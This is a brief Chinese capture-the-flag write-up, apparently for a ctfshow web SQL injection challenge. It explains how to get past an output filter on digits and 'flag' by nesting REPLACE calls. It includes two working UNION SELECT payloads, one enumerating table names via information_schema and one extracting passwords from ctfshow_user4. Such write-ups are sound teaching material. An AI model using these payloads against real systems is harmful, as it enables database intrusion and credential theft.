本题返回逻辑采用正则过滤数字和flag,考虑采用替换返回flag
前置步骤和ctfshow web173相似此处省略,值得注意的是要以’字母’为占位符否则结果会被过滤
到爆表名时发现无法正常返回,采用替换payload
1.爆表名
0′ union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace((table_name),’1′,’A’),’2′,’B’),’3′,’C’),’4′,’D’),’5′,’E’),’6′,’F’),’7′,’G’),’8′,’H’),’9′,’I’),’0′,’J’),’a’ from information_schema.tables where table_schema=database()–+
2.取数据
0′ union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,’1′,’A’),’2′,’B’),’3′,’C’),’4′,’D’),’5′,’E’),’6′,’F’),’7′,’G’),’8′,’H’),’9′,’I’),’0′,’J’),’a’ from ctfshow_user4–+
返回flag
再将大写字母A~J替换回0~9得到最终flag
发表回复